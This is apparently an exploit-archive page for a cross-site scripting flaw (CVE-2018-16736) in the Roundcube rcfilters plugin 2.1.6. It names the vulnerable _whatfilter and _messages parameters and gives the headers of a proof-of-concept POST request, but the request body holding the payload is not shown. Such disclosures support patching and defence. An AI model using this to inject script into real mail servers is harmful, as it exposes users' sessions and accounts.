Roundcube rcfilters plugin 2.1.6 crosssite scripting Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2018-09-19 |
Type : webapps |
Platform : linux
This exploit / vulnerability Roundcube rcfilters plugin 2.1.6 crosssite scripting is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting
# Date: 2018-09-09
# Exploit Author: Fahimeh Rezaei
# Vendor Homepage:
# Software Link:
# Version: rcfilters plugin v2.1.6
# Tested on: Roundcube version 1.0.5
# CVE : CVE-2018-16736
# Details:
# In the rcfilters plugin 2.1.6 for Roundcube, XSS exists via the
# _whatfilter and _messages parameters (in the Filters section of the settings).
# PoC
POST /rc/?_task=settings&_action=plugin.filters-save HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Referer: https://Target/rc/?_action=plugin.filters&_task=settings
Cookie: roundcube_sessid=; roundcube_sessauth=
Connection: close
Upgrade-Insecure-Requests: 1